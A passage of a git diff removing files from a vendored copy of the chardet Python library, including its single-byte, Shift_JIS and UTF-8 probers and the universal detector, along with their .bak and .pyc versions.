NEGATIVE_SHORTCUT_THRESHOLD)) - self._mState = constants.eNotMe - - return self.get_state() - - def get_confidence(self): - r = 0.01 - if self._mTotalSeqs > 0: -# print self._mSeqCounters[POSITIVE_CAT], self._mTotalSeqs, self._mModel['mTypicalPositiveRatio'] - r = (1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs / self._mModel['mTypicalPositiveRatio'] -# print r, self._mFreqChar, self._mTotalChar - r = r * self._mFreqChar / self._mTotalChar - if r >= 1.0: - r = 0.99 - return r diff --git a/chardet/chardet/sbcharsetprober.py.bak b/chardet/chardet/sbcharsetprober.py.bak deleted file mode 100644 index da07116..0000000 --- a/chardet/chardet/sbcharsetprober.py.bak +++ /dev/null @@ -1,106 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants, sys -from charsetprober import CharSetProber - -SAMPLE_SIZE = 64 -SB_ENOUGH_REL_THRESHOLD = 1024 -POSITIVE_SHORTCUT_THRESHOLD = 0.95 -NEGATIVE_SHORTCUT_THRESHOLD = 0.05 -SYMBOL_CAT_ORDER = 250 -NUMBER_OF_SEQ_CAT = 4 -POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1 -#NEGATIVE_CAT = 0 - -class SingleByteCharSetProber(CharSetProber): - def __init__(self, model, reversed=constants.False, nameProber=None): - CharSetProber.__init__(self) - self._mModel = model - self._mReversed = reversed # TRUE if we need to reverse every pair in the model lookup - self._mNameProber = nameProber # Optional auxiliary prober for name decision - self.reset() - - def reset(self): - CharSetProber.reset(self) - self._mLastOrder = 255 # char order of last character - self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT - self._mTotalSeqs = 0 - self._mTotalChar = 0 - self._mFreqChar = 0 # characters that fall in our sampling range - - def get_charset_name(self): - if self._mNameProber: - return self._mNameProber.get_charset_name() - else: - return self._mModel['charsetName'] - - def feed(self, aBuf): - if not self._mModel['keepEnglishLetter']: - aBuf = self.filter_without_english_letters(aBuf) - aLen = len(aBuf) - if not aLen: - return self.get_state() - for c in aBuf: - order = self._mModel['charToOrderMap'][ord(c)] - if order < SYMBOL_CAT_ORDER: - self._mTotalChar += 1 - if order < SAMPLE_SIZE: - self._mFreqChar += 1 - if self._mLastOrder < SAMPLE_SIZE: - self._mTotalSeqs += 1 - if not self._mReversed: - self._mSeqCounters[self._mModel['precedenceMatrix'][(self._mLastOrder * SAMPLE_SIZE) + order]] += 1 - else: # reverse the order of the letters in the lookup - self._mSeqCounters[self._mModel['precedenceMatrix'][(order * SAMPLE_SIZE) + self._mLastOrder]] += 1 - self._mLastOrder = order - - if self.get_state() == constants.eDetecting: - if self._mTotalSeqs > SB_ENOUGH_REL_THRESHOLD: - cf = self.get_confidence() - if cf > POSITIVE_SHORTCUT_THRESHOLD: - if constants._debug: - sys.stderr.write('%s confidence = %s, we have a winner\n' % (self._mModel['charsetName'], cf)) - self._mState = constants.eFoundIt - elif cf < NEGATIVE_SHORTCUT_THRESHOLD: - if constants._debug: - sys.stderr.write('%s confidence = %s, below negative shortcut threshhold %s\n' % (self._mModel['charsetName'], cf, NEGATIVE_SHORTCUT_THRESHOLD)) - self._mState = constants.eNotMe - - return self.get_state() - - def get_confidence(self): - r = 0.01 - if self._mTotalSeqs > 0: -# print self._mSeqCounters[POSITIVE_CAT], self._mTotalSeqs, self._mModel['mTypicalPositiveRatio'] - r = (1.0 * self._mSeqCounters[POSITIVE_CAT]) / self._mTotalSeqs / self._mModel['mTypicalPositiveRatio'] -# print r, self._mFreqChar, self._mTotalChar - r = r * self._mFreqChar / self._mTotalChar - if r >= 1.0: - r = 0.99 - return r diff --git a/chardet/chardet/sbcharsetprober.pyc b/chardet/chardet/sbcharsetprober.pyc deleted file mode 100644 index b0bad59..0000000 Binary files a/chardet/chardet/sbcharsetprober.pyc and /dev/null differ diff --git a/chardet/chardet/sbcsgroupprober.py b/chardet/chardet/sbcsgroupprober.py deleted file mode 100644 index 139334a..0000000 --- a/chardet/chardet/sbcsgroupprober.py +++ /dev/null @@ -1,65 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants -import sys -from .charsetgroupprober import CharSetGroupProber -from .sbcharsetprober import SingleByteCharSetProber -from .langcyrillicmodel import Win1251CyrillicModel, Koi8rModel, Latin5CyrillicModel, MacCyrillicModel, Ibm866Model, Ibm855Model -from .langgreekmodel import Latin7GreekModel, Win1253GreekModel -from .langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel -from .langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel -from .langthaimodel import TIS620ThaiModel -from .langhebrewmodel import Win1255HebrewModel -from .hebrewprober import HebrewProber - -class SBCSGroupProber(CharSetGroupProber): - def __init__(self): - CharSetGroupProber.__init__(self) - self._mProbers = [ \ - SingleByteCharSetProber(Win1251CyrillicModel), - SingleByteCharSetProber(Koi8rModel), - SingleByteCharSetProber(Latin5CyrillicModel), - SingleByteCharSetProber(MacCyrillicModel), - SingleByteCharSetProber(Ibm866Model), - SingleByteCharSetProber(Ibm855Model), - SingleByteCharSetProber(Latin7GreekModel), - SingleByteCharSetProber(Win1253GreekModel), - SingleByteCharSetProber(Latin5BulgarianModel), - SingleByteCharSetProber(Win1251BulgarianModel), - SingleByteCharSetProber(Latin2HungarianModel), - SingleByteCharSetProber(Win1250HungarianModel), - SingleByteCharSetProber(TIS620ThaiModel), - ] - hebrewProber = HebrewProber() - logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, False, hebrewProber) - visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, True, hebrewProber) - hebrewProber.set_model_probers(logicalHebrewProber, visualHebrewProber) - self._mProbers.extend([hebrewProber, logicalHebrewProber, visualHebrewProber]) - - self.reset() diff --git a/chardet/chardet/sbcsgroupprober.py.bak b/chardet/chardet/sbcsgroupprober.py.bak deleted file mode 100644 index d19160c..0000000 --- a/chardet/chardet/sbcsgroupprober.py.bak +++ /dev/null @@ -1,64 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants, sys -from charsetgroupprober import CharSetGroupProber -from sbcharsetprober import SingleByteCharSetProber -from langcyrillicmodel import Win1251CyrillicModel, Koi8rModel, Latin5CyrillicModel, MacCyrillicModel, Ibm866Model, Ibm855Model -from langgreekmodel import Latin7GreekModel, Win1253GreekModel -from langbulgarianmodel import Latin5BulgarianModel, Win1251BulgarianModel -from langhungarianmodel import Latin2HungarianModel, Win1250HungarianModel -from langthaimodel import TIS620ThaiModel -from langhebrewmodel import Win1255HebrewModel -from hebrewprober import HebrewProber - -class SBCSGroupProber(CharSetGroupProber): - def __init__(self): - CharSetGroupProber.__init__(self) - self._mProbers = [ \ - SingleByteCharSetProber(Win1251CyrillicModel), - SingleByteCharSetProber(Koi8rModel), - SingleByteCharSetProber(Latin5CyrillicModel), - SingleByteCharSetProber(MacCyrillicModel), - SingleByteCharSetProber(Ibm866Model), - SingleByteCharSetProber(Ibm855Model), - SingleByteCharSetProber(Latin7GreekModel), - SingleByteCharSetProber(Win1253GreekModel), - SingleByteCharSetProber(Latin5BulgarianModel), - SingleByteCharSetProber(Win1251BulgarianModel), - SingleByteCharSetProber(Latin2HungarianModel), - SingleByteCharSetProber(Win1250HungarianModel), - SingleByteCharSetProber(TIS620ThaiModel), - ] - hebrewProber = HebrewProber() - logicalHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, constants.False, hebrewProber) - visualHebrewProber = SingleByteCharSetProber(Win1255HebrewModel, constants.True, hebrewProber) - hebrewProber.set_model_probers(logicalHebrewProber, visualHebrewProber) - self._mProbers.extend([hebrewProber, logicalHebrewProber, visualHebrewProber]) - - self.reset() diff --git a/chardet/chardet/sbcsgroupprober.pyc b/chardet/chardet/sbcsgroupprober.pyc deleted file mode 100644 index 6ec3e06..0000000 Binary files a/chardet/chardet/sbcsgroupprober.pyc and /dev/null differ diff --git a/chardet/chardet/sjisprober.py b/chardet/chardet/sjisprober.py deleted file mode 100644 index 349e9c4..0000000 --- a/chardet/chardet/sjisprober.py +++ /dev/null @@ -1,86 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from .mbcharsetprober import MultiByteCharSetProber -from .codingstatemachine import CodingStateMachine -from .chardistribution import SJISDistributionAnalysis -from .jpcntx import SJISContextAnalysis -from .mbcssm import SJISSMModel -from . import constants -import sys -from .constants import eStart, eError, eItsMe - -class SJISProber(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(SJISSMModel) - self._mDistributionAnalyzer = SJISDistributionAnalysis() - self._mContextAnalyzer = SJISContextAnalysis() - self.reset() - - def reset(self): - MultiByteCharSetProber.reset(self) - self._mContextAnalyzer.reset() - - def get_charset_name(self): - return "SHIFT_JIS" - - def feed(self, aBuf): - aLen = len(aBuf) - for i in range(0, aLen): - codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: - if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') - self._mState = constants.eNotMe - break - elif codingState == eItsMe: - self._mState = constants.eFoundIt - break - elif codingState == eStart: - charLen = self._mCodingSM.get_current_charlen() - if i == 0: - self._mLastChar[1] = aBuf[0] - self._mContextAnalyzer.feed(self._mLastChar[2 - charLen :], charLen) - self._mDistributionAnalyzer.feed(self._mLastChar, charLen) - else: - self._mContextAnalyzer.feed(aBuf[i + 1 - charLen : i + 3 - charLen], charLen) - self._mDistributionAnalyzer.feed(aBuf[i - 1 : i + 1], charLen) - - self._mLastChar[0] = aBuf[aLen - 1] - - if self.get_state() == constants.eDetecting: - if self._mContextAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): - self._mState = constants.eFoundIt - - return self.get_state() - - def get_confidence(self): - contxtCf = self._mContextAnalyzer.get_confidence() - distribCf = self._mDistributionAnalyzer.get_confidence() - return max(contxtCf, distribCf) diff --git a/chardet/chardet/sjisprober.py.bak b/chardet/chardet/sjisprober.py.bak deleted file mode 100644 index fea2690..0000000 --- a/chardet/chardet/sjisprober.py.bak +++ /dev/null @@ -1,85 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from mbcharsetprober import MultiByteCharSetProber -from codingstatemachine import CodingStateMachine -from chardistribution import SJISDistributionAnalysis -from jpcntx import SJISContextAnalysis -from mbcssm import SJISSMModel -import constants, sys -from constants import eStart, eError, eItsMe - -class SJISProber(MultiByteCharSetProber): - def __init__(self): - MultiByteCharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(SJISSMModel) - self._mDistributionAnalyzer = SJISDistributionAnalysis() - self._mContextAnalyzer = SJISContextAnalysis() - self.reset() - - def reset(self): - MultiByteCharSetProber.reset(self) - self._mContextAnalyzer.reset() - - def get_charset_name(self): - return "SHIFT_JIS" - - def feed(self, aBuf): - aLen = len(aBuf) - for i in range(0, aLen): - codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: - if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') - self._mState = constants.eNotMe - break - elif codingState == eItsMe: - self._mState = constants.eFoundIt - break - elif codingState == eStart: - charLen = self._mCodingSM.get_current_charlen() - if i == 0: - self._mLastChar[1] = aBuf[0] - self._mContextAnalyzer.feed(self._mLastChar[2 - charLen :], charLen) - self._mDistributionAnalyzer.feed(self._mLastChar, charLen) - else: - self._mContextAnalyzer.feed(aBuf[i + 1 - charLen : i + 3 - charLen], charLen) - self._mDistributionAnalyzer.feed(aBuf[i - 1 : i + 1], charLen) - - self._mLastChar[0] = aBuf[aLen - 1] - - if self.get_state() == constants.eDetecting: - if self._mContextAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): - self._mState = constants.eFoundIt - - return self.get_state() - - def get_confidence(self): - contxtCf = self._mContextAnalyzer.get_confidence() - distribCf = self._mDistributionAnalyzer.get_confidence() - return max(contxtCf, distribCf) diff --git a/chardet/chardet/sjisprober.pyc b/chardet/chardet/sjisprober.pyc deleted file mode 100644 index f5b3a96..0000000 Binary files a/chardet/chardet/sjisprober.pyc and /dev/null differ diff --git a/chardet/chardet/universaldetector.py b/chardet/chardet/universaldetector.py deleted file mode 100644 index 0820d59..0000000 --- a/chardet/chardet/universaldetector.py +++ /dev/null @@ -1,155 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants -import sys -from .latin1prober import Latin1Prober # windows-1252 -from .mbcsgroupprober import MBCSGroupProber # multi-byte character sets -from .sbcsgroupprober import SBCSGroupProber # single-byte character sets -from .escprober import EscCharSetProber # ISO-2122, etc. -import re - -MINIMUM_THRESHOLD = 0.20 -ePureAscii = 0 -eEscAscii = 1 -eHighbyte = 2 - -class UniversalDetector: - def __init__(self): - self._highBitDetector = re.compile(b'[\x80-\xFF]') - self._escDetector = re.compile(b'(\033|~{)') - self._mEscCharSetProber = None - self._mCharSetProbers = [] - self.reset() - - def reset(self): - self.result = {'encoding': None, 'confidence': 0.0} - self.done = False - self._mStart = True - self._mGotData = False - self._mInputState = ePureAscii - self._mLastChar = b'' - if self._mEscCharSetProber: - self._mEscCharSetProber.reset() - for prober in self._mCharSetProbers: - prober.reset() - - def feed(self, aBuf): - if self.done: return - - aLen = len(aBuf) - if not aLen: return - - if not self._mGotData: - # If the data starts with BOM, we know it is UTF - if aBuf[:3] == '\xEF\xBB\xBF': - # EF BB BF UTF-8 with BOM - self.result = {'encoding': "UTF-8", 'confidence': 1.0} - elif aBuf[:4] == '\xFF\xFE\x00\x00': - # FF FE 00 00 UTF-32, little-endian BOM - self.result = {'encoding': "UTF-32LE", 'confidence': 1.0} - elif aBuf[:4] == '\x00\x00\xFE\xFF': - # 00 00 FE FF UTF-32, big-endian BOM - self.result = {'encoding': "UTF-32BE", 'confidence': 1.0} - elif aBuf[:4] == '\xFE\xFF\x00\x00': - # FE FF 00 00 UCS-4, unusual octet order BOM (3412) - self.result = {'encoding': "X-ISO-10646-UCS-4-3412", 'confidence': 1.0} - elif aBuf[:4] == '\x00\x00\xFF\xFE': - # 00 00 FF FE UCS-4, unusual octet order BOM (2143) - self.result = {'encoding': "X-ISO-10646-UCS-4-2143", 'confidence': 1.0} - elif aBuf[:2] == '\xFF\xFE': - # FF FE UTF-16, little endian BOM - self.result = {'encoding': "UTF-16LE", 'confidence': 1.0} - elif aBuf[:2] == '\xFE\xFF': - # FE FF UTF-16, big endian BOM - self.result = {'encoding': "UTF-16BE", 'confidence': 1.0} - - self._mGotData = True - if self.result['encoding'] and (self.result['confidence'] > 0.0): - self.done = True - return - - if self._mInputState == ePureAscii: - if self._highBitDetector.search(aBuf): - self._mInputState = eHighbyte - elif (self._mInputState == ePureAscii) and self._escDetector.search(self._mLastChar + aBuf): - self._mInputState = eEscAscii - - self._mLastChar = aBuf[-1:] - - if self._mInputState == eEscAscii: - if not self._mEscCharSetProber: - self._mEscCharSetProber = EscCharSetProber() - if self._mEscCharSetProber.feed(aBuf) == constants.eFoundIt: - self.result = {'encoding': self._mEscCharSetProber.get_charset_name(), - 'confidence': self._mEscCharSetProber.get_confidence()} - self.done = True - elif self._mInputState == eHighbyte: - if not self._mCharSetProbers: - self._mCharSetProbers = [MBCSGroupProber(), SBCSGroupProber(), Latin1Prober()] - for prober in self._mCharSetProbers: - if prober.feed(aBuf) == constants.eFoundIt: - self.result = {'encoding': prober.get_charset_name(), - 'confidence': prober.get_confidence()} - self.done = True - break - - def close(self): - if self.done: return - if not self._mGotData: - if constants._debug: - sys.stderr.write('no data received!\n') - return - self.done = True - - if self._mInputState == ePureAscii: - self.result = {'encoding': 'ascii', 'confidence': 1.0} - return self.result - - if self._mInputState == eHighbyte: - proberConfidence = None - maxProberConfidence = 0.0 - maxProber = None - for prober in self._mCharSetProbers: - if not prober: continue - proberConfidence = prober.get_confidence() - if proberConfidence > maxProberConfidence: - maxProberConfidence = proberConfidence - maxProber = prober - if maxProber and (maxProberConfidence > MINIMUM_THRESHOLD): - self.result = {'encoding': maxProber.get_charset_name(), - 'confidence': maxProber.get_confidence()} - return self.result - - if constants._debug: - sys.stderr.write('no probers hit minimum threshhold\n') - for prober in self._mCharSetProbers[0].mProbers: - if not prober: continue - sys.stderr.write('%s confidence = %s\n' % \ - (prober.get_charset_name(), \ - prober.get_confidence())) diff --git a/chardet/chardet/universaldetector.py.bak b/chardet/chardet/universaldetector.py.bak deleted file mode 100644 index 809df22..0000000 --- a/chardet/chardet/universaldetector.py.bak +++ /dev/null @@ -1,154 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants, sys -from latin1prober import Latin1Prober # windows-1252 -from mbcsgroupprober import MBCSGroupProber # multi-byte character sets -from sbcsgroupprober import SBCSGroupProber # single-byte character sets -from escprober import EscCharSetProber # ISO-2122, etc. -import re - -MINIMUM_THRESHOLD = 0.20 -ePureAscii = 0 -eEscAscii = 1 -eHighbyte = 2 - -class UniversalDetector: - def __init__(self): - self._highBitDetector = re.compile(r'[\x80-\xFF]') - self._escDetector = re.compile(r'(\033|~{)') - self._mEscCharSetProber = None - self._mCharSetProbers = [] - self.reset() - - def reset(self): - self.result = {'encoding': None, 'confidence': 0.0} - self.done = constants.False - self._mStart = constants.True - self._mGotData = constants.False - self._mInputState = ePureAscii - self._mLastChar = '' - if self._mEscCharSetProber: - self._mEscCharSetProber.reset() - for prober in self._mCharSetProbers: - prober.reset() - - def feed(self, aBuf): - if self.done: return - - aLen = len(aBuf) - if not aLen: return - - if not self._mGotData: - # If the data starts with BOM, we know it is UTF - if aBuf[:3] == '\xEF\xBB\xBF': - # EF BB BF UTF-8 with BOM - self.result = {'encoding': "UTF-8", 'confidence': 1.0} - elif aBuf[:4] == '\xFF\xFE\x00\x00': - # FF FE 00 00 UTF-32, little-endian BOM - self.result = {'encoding': "UTF-32LE", 'confidence': 1.0} - elif aBuf[:4] == '\x00\x00\xFE\xFF': - # 00 00 FE FF UTF-32, big-endian BOM - self.result = {'encoding': "UTF-32BE", 'confidence': 1.0} - elif aBuf[:4] == '\xFE\xFF\x00\x00': - # FE FF 00 00 UCS-4, unusual octet order BOM (3412) - self.result = {'encoding': "X-ISO-10646-UCS-4-3412", 'confidence': 1.0} - elif aBuf[:4] == '\x00\x00\xFF\xFE': - # 00 00 FF FE UCS-4, unusual octet order BOM (2143) - self.result = {'encoding': "X-ISO-10646-UCS-4-2143", 'confidence': 1.0} - elif aBuf[:2] == '\xFF\xFE': - # FF FE UTF-16, little endian BOM - self.result = {'encoding': "UTF-16LE", 'confidence': 1.0} - elif aBuf[:2] == '\xFE\xFF': - # FE FF UTF-16, big endian BOM - self.result = {'encoding': "UTF-16BE", 'confidence': 1.0} - - self._mGotData = constants.True - if self.result['encoding'] and (self.result['confidence'] > 0.0): - self.done = constants.True - return - - if self._mInputState == ePureAscii: - if self._highBitDetector.search(aBuf): - self._mInputState = eHighbyte - elif (self._mInputState == ePureAscii) and self._escDetector.search(self._mLastChar + aBuf): - self._mInputState = eEscAscii - - self._mLastChar = aBuf[-1] - - if self._mInputState == eEscAscii: - if not self._mEscCharSetProber: - self._mEscCharSetProber = EscCharSetProber() - if self._mEscCharSetProber.feed(aBuf) == constants.eFoundIt: - self.result = {'encoding': self._mEscCharSetProber.get_charset_name(), - 'confidence': self._mEscCharSetProber.get_confidence()} - self.done = constants.True - elif self._mInputState == eHighbyte: - if not self._mCharSetProbers: - self._mCharSetProbers = [MBCSGroupProber(), SBCSGroupProber(), Latin1Prober()] - for prober in self._mCharSetProbers: - if prober.feed(aBuf) == constants.eFoundIt: - self.result = {'encoding': prober.get_charset_name(), - 'confidence': prober.get_confidence()} - self.done = constants.True - break - - def close(self): - if self.done: return - if not self._mGotData: - if constants._debug: - sys.stderr.write('no data received!\n') - return - self.done = constants.True - - if self._mInputState == ePureAscii: - self.result = {'encoding': 'ascii', 'confidence': 1.0} - return self.result - - if self._mInputState == eHighbyte: - proberConfidence = None - maxProberConfidence = 0.0 - maxProber = None - for prober in self._mCharSetProbers: - if not prober: continue - proberConfidence = prober.get_confidence() - if proberConfidence > maxProberConfidence: - maxProberConfidence = proberConfidence - maxProber = prober - if maxProber and (maxProberConfidence > MINIMUM_THRESHOLD): - self.result = {'encoding': maxProber.get_charset_name(), - 'confidence': maxProber.get_confidence()} - return self.result - - if constants._debug: - sys.stderr.write('no probers hit minimum threshhold\n') - for prober in self._mCharSetProbers[0].mProbers: - if not prober: continue - sys.stderr.write('%s confidence = %s\n' % \ - (prober.get_charset_name(), \ - prober.get_confidence())) diff --git a/chardet/chardet/universaldetector.pyc b/chardet/chardet/universaldetector.pyc deleted file mode 100644 index 73669a3..0000000 Binary files a/chardet/chardet/universaldetector.pyc and /dev/null differ diff --git a/chardet/chardet/utf8prober.py b/chardet/chardet/utf8prober.py deleted file mode 100644 index 12db07c..0000000 --- a/chardet/chardet/utf8prober.py +++ /dev/null @@ -1,77 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants -import sys -from .constants import eStart, eError, eItsMe -from .charsetprober import CharSetProber -from .codingstatemachine import CodingStateMachine -from .mbcssm import UTF8SMModel - -ONE_CHAR_PROB = 0.5 - -class UTF8Prober(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self._mCodingSM = CodingStateMachine(UTF8SMModel) - self.reset() - - def reset(self): - CharSetProber.reset(self) - self._mCodingSM.reset() - self._mNumOfMBChar = 0 - - def get_charset_name(self): - return "utf-8" - - def feed(self, aBuf): - for c in aBuf: - codingState = self._mCodingSM.next_state(c) - if codingState == eError: - self._mState = constants.eNotMe - break - elif codingState == eItsMe: - self._mState = constants.eFoundIt - break - elif codingState == eStart: - if self._mCodingSM.get_current_charlen() >= 2: - self._mNumOfMBChar += 1 - - if self.get_state() == constants.eDetecting: - if self.get_confidence() > constants.SHORTCUT_THRESHOLD: - self._mState = constants.eFoundIt - - return self.get_state() - - def get_confidence(self): - unlike = 0.99 - if self._mNumOfMBChar < 6: - for i in range(0, self._mNumOfMBChar): - unlike = unlike * ONE_CHAR_PROB - return 1.0 - unlike - else: - return unlike diff --git a/chardet/chardet/utf8prober.py.bak b/chardet/chardet/utf8prober.py.bak deleted file mode 100644 index c1792bb..0000000 --- a/chardet/chardet/utf8prober.py.bak +++ /dev/null @@ -1,76 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 